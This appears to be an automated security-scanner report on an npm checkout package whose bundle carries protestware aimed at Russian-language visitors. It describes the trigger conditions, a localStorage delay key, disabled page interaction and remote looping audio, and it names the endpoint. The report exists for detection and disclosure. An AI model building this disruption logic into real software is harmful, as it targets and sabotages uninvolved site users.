AI Security Review
scanned 8h ago · by lpm-firewall-aiThe bundled browser script contains protestware that disrupts pages for Russian-language users on targeted TLDs. It persists a localStorage timestamp, then disables page interaction and plays remote audio after a delay window.
Static reason
One or more suspicious static signals were detected.
Trigger
Loading dist/engine.js in a browser matching ru language and targeted host TLD after the localStorage delay
Impact
Affected storefront pages can become unusable and play unsolicited remote audio.
Mechanism
protestware page disruption in bundled dependency code
Attack narrative
When the package's main browser bundle loads, embedded SweetAlert2 code checks navigator.language and the page host. On matching Russian-language users and targeted TLDs, it records a localStorage timestamp; after the delay threshold, it disables body pointer events and appends a looping audio element sourced from flag-gimn.ru. This is non-consensual runtime disruption unrelated to checkout behavior.
Rationale
Static inspection confirms concrete protestware in the shipped main bundle, despite otherwise package-aligned checkout API behavior and no install hook. Because the code can intentionally degrade consumer sites for a targeted user/host class, this is malicious rather than a noisy scanner hit.
Evidence
package.jsondist/engine.jsreadme.mdlocalStorage:swal-initiationdocument.bodyinjected audio element
Network endpoints1
flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3
Decision evidence
public snapshotAI called this Malicious at 92.0% confidence as Malware with low false-positive risk.
Evidence for block
- dist/engine.js bundles SweetAlert2 code that checks Russian browser language and .ru/.su/.by/xn--p1ai hosts.
- dist/engine.js stores localStorage key swal-initiation and after 3 days disables document.body pointer events.
- dist/engine.js injects looping audio from https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3.
- Behavior is import/runtime activated in the browser, not limited to a documented user-invoked feature.
Evidence against
- package.json has no npm lifecycle hooks or bin entries.
- Main package functionality is a checkout engine with Konnektive/CheckoutChamp API calls.
- Scanner secret hint appears to be test card numbers/config values, not hardcoded credentials.
- No child_process, filesystem writes, native binaries, or AI-agent control-surface writes found.
Behavioral surface
ChildProcessEval
HighEntropyStringsMinifiedTrivialUrlStrings
Source & flagged code
3 flagged · loading sourcedist/engine.jsView file
1patternName = google_api_key
severity = high
line = 1
matchedText = !functio...)));
High
1patternName = google_api_key
severity = high
line = 1
matchedText = !functio...)));
High
1!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t(require("jQuery"));else if("function"==typeof define&&define.amd)define(["jQuery"],t);else{var ...
Low
Eval
Package source references a known benign dynamic code generation pattern.
dist/engine.jsView on unpkg · L1Findings
2 High4 Low
HighHigh Secretdist/engine.js
HighSecret Patterndist/engine.js
LowScripts Present
LowEvaldist/engine.js
LowHigh Entropy Strings
LowUrl Strings